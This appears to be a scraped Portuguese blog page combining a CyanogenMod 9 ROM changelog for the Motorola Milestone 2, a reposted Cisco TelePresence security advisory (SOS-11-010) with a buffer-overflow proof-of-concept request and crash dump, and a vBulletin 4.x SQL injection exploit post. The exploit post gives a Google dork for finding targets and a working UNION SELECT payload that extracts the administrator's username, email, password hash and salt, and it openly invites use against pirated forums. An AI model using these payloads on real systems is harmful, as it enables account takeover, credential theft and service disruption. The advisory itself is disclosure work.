Android 4.04 quase saindo do forno para Milestone 2 (cyanogenmod 9)

Standard

Ao que já podemos especular, afirma-se que, mesmo com alguns bugs restantes há uma rom disponível no fórum do XDA cuja estabilidade já é de bastante agrado.

Há ainda pouca coisa a ser feita, pois o plugin de flash 11 teve de ser desativado por estar colidindo com um codec.

Há também um outro bug que pode incomodar algumas pessoas, wifi como access point.

Podemos deduzir, pelo tamanho do projeto e a sua jornada vitoriosa de debug que muito em breve (em poucos dias) teremos uma rom stable e muito funcional do ICS 4.04 rodando tranquilamente sob o milestone 2. Os requisitos para rodar o ICE 4.04 já são alcançados não só pelo Milestone 2, como também aparelhos como Xperia e i9000 (assim como outras linhas que possuem hardware muito semelhante), estes requerimentos podem ser vistos aqui:

http://www.appunix.com.br/blog/quais-os-recursos-necessarios-para-rodar-google-android-4-0-ice-cream-sandwich/

Acompanhe todo o changelog:

 

Default [ROM][NIGHTLY] CyanogenMod 9 for Motorola Milestone 2 (Android 4.0.4)

Hi All,

This rom is based on tezet framework, merge cyanogenmod latest source code and camera code from defy. Its still a ALPHA version, bugs report is welcome.

Working:
– Features from tezet rom.
– Recording (works, but unstable)
– Panorama (built-in camera app)
– Barcode scanner
– VPN(PPTP MPPE)
– 1% Battery
– H264 high profile decoding(but laggy!)
– HWA (all credit to nadlabak, excellent and fantastic works bring whole BL devices to new stage!!)
– Chrome (http://forum.xda-developers.com/show…&postcount=356)

Not working:
– Flash11 (conflict with TI.720P.Decoder)
– Crystal Talk
– Wifi tether
– bandwidth quota

Known Bugs:
– Brightness sensor
– HW Keyboard function(CAP, ALT)

Changelog:
* 2012/7/8:
– update GPU driver to PVR 1.8
– add nadlabak driver solution
– enable HWA
– remove previous opengl hack
– sync repo 07/08
– delist 3G Roaming bug(http://forum.xda-developers.com/show…&postcount=281)

* 2012/7/1:
– enable TI.720P Decoder (need more fine tune with buffering)
– fix recording problem
– sync repo 07/01

* 2012/6/24:
– fix QWERTZ keyboard
– fix unknown number problem
– new boot animation
– sync repo 06/24

* 2012/6/2:
– barcode scanner works
– built-in VPN with mpppe works (I only test this kind)
– add 1% battery
– fix AZERTY keyboard (thx boorce.com)
– sync repo 06/02

* 2012/5/27:
– fix crash problem when take picture

* 2012/5/26:
– sync cm9 repo
– add panorama support
– add Apollo(music app)
– add CMWallpaper
Bugfix:
– settings->themes will not crash

* 2012/5/11: sync 0511 repo

ADB debugging shouldn’t be disabled, full wipe is recommended.

Downloads:
European GB kernel: CM9-NIGHTLY 
**China GB kernel: CM9-NIGHTLY 
**China version is not tested by myself, so use it on your own risk.

Google Apps

Repository:
repo init -u git://github.com/alexc804/android.git -b ics

twitter: AlexC804 

Credits to tezet, rondoval, tpruvot and people contributed to this rom.

 

Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

Standard


Sense of Security - Security Advisory - SOS-11-010

Release Date. 19-Sep-2011
Last Update. -
Vendor Notification Date. 21-Feb-2011
Product. Cisco TelePresence Series
Platform. Cisco
Affected versions. C < = TC4.1.2, MXP <= F9.1 Severity Rating. Low - Medium Impact. Cookie/credential theft, impersonation, loss of confidentiality, client-side code execution, denial of service. Solution Status. Vendor patch References. 1. CVE-2011-2544 (CSCtq46488) 2. CVE-2011-2543 (CSCtq46496) 3. CVE-2011-2577 (CSCtq46500) Details. Cisco TelePresence is an umbrella term for Video Conferencing Hardware and Software, Infrastructure and Endpoints. The C & MXP Series are the Endpoints used on desks or in boardrooms to provide users with a termination point for Video Conferencing. 1. Post-authentication HTML Injection - CVE-2011-2544 (CSCtq46488): Cisco TelePresence Endpoints have a web interface (HTTP or HTTPS) for managing, configuring and reporting. It is possible to set the Call ID (with H.323 or SIP) to a HTML value. If a call is made to another endpoint and an authenticated user browses to the web interface on the endpoint receiving the call (e.g. to view call statistics), the HTML will render locally within the context of the logged in user. From this point it is possible to make changes to the system as the authenticated user. The flaw is due to the flexibility of the H.323 ID or SIP Display Name fields and failure to correctly validate user input. Examples (MXP): Rebooting the system:
The attacker may also choose to change passwords in the system, disable
encryption or enable telnet:

2. Post-authentication Memory Corruption - CVE-2011-2543 (CSCtq46496):
Cisco TelePresence systems (Endpoints and Infrastructure) use XPath for
setting and getting configuration.

Example syntax is:
http://ip/getxml?location=/Configuration/Video
The request is sent to a locally listening shell (tshell). This is the
case for all requests relating to performing an action on the system (e.g.
config get or set). The shell then sends the input to the "main"
application (/app/main, id=0), and the data is passed as a parameter.

It was discovered that the getXML handle does not properly perform
length checking on the user supplied input before passing it to the
tshell. Furthermore, there is no length checking performed in the tshell
and no bounds checking performed in the main application where the
parameter is consumed. As such, it is possible to send input that
exceeds the size of the receiving buffer, subsequently causing an
invalid address to be read. This causes a reboot on the Endpoints. The
VCS will not reboot, the process will crash by SIGSEGV (or sigabrt) but
it will restart the process itself which drops all calls.

Proof of Concept: GET
/wsgi/getxml?location="+("A"*5200)+("x60"*4)+("X"*4)+"HTTP/1.1rn
Host: 192.168.6.99rnrn"

Received signal SIGSEGV (11) in thread 0x129e8480, TID 2670
Illegal memory access at: 0x5858585c
Registers:
GPR00: 00f2c908 129e5960 129ef920 00000005 00000040 0000000c 00000037
0f315580
GPR08: 00000005 129e5a70 129e5a80 58585858 0f3272d4 11589858 129e6896
0000000b
GPR16: 129e6084 11164a1c 00000000 129e6894 00000037 1299ca18 00000005
00000002
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac
129e5960
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac
129e5960
NIP: 0f39abc8 MSR: 0000d032 OGPR3: 00000002

As you can see, the crash string is passed as a parameter in GPR 8.
The severity of this issue is compounded by the fact that the main
application runs as root, this could potentially lead to arbitrary code
execution.

3. Pre-authentication SIP Denial of Service - CVE-2011-2577 (CSCtq46500):
Cisco TelePresence Endpoints utilise SIP for the call setup protocol.
Sending a SIP INVITE with a 4x8 a"s in the MAC Address field and the
receive field causes the system to reboot.

Proof of Concept: MXP:
Exception 0x1100 : Data TLB load miss Active task
FsmMain FSM process : SipTrnsp(0) FSM message : SipTrnsp_Send_Msg_Req
from SipTrnsp(0) Data TLB miss (DMISS) : 0x00000000 (illegal addr.
accessed)

Solution.
Upgrade to TC4.2 for the C series to fix validation issues.

Discovered by.
David Klein, Sense of Security Labs.

About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the countries largest
organisations.

Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php

Fonte: http://www.exploit-db.com/exploits/17871/

Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

Standard


# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S
# Software Link: [[url]http://www.vbulletin.com/][/url]
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : [[url]http://members.vbulletin.com/][/url]

######################################################################################################
Vulnerability:
######################################################################################################

Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.

#####################################################################################################
Vulnerable Code:
#####################################################################################################

File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid

if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)

{

$value = $registry->GPC['messagegroupid'];

if (!is_array($value))

{

$value = array($value);

}

if (!(in_array(' ',$value) OR in_array('',$value)))

{

if ($rst = $vbulletin->db->query_read("

SELECT socialgroup.name

FROM " . TABLE_PREFIX."socialgroup AS socialgroup

---> WHERE socialgroup.groupid IN (" . implode(', ', $value) .")")

}

############################################################################################
Exploitation:
############################################################################################
Post data on: -->search.php?search_type=1
--> Search Single Content Type

Keywords : Valid Group Message

Search Type : Group Messages

Search in Group : Valid Group Id

&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

##########################################################################################
More Details:
##########################################################################################
Http://www.Garage4Hackers.com
http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day

###########################################################################################
Note:
###########################################################################################

Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as it was reported to them by altex, hence
customers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there. " Say No to Piracy Disclosure ".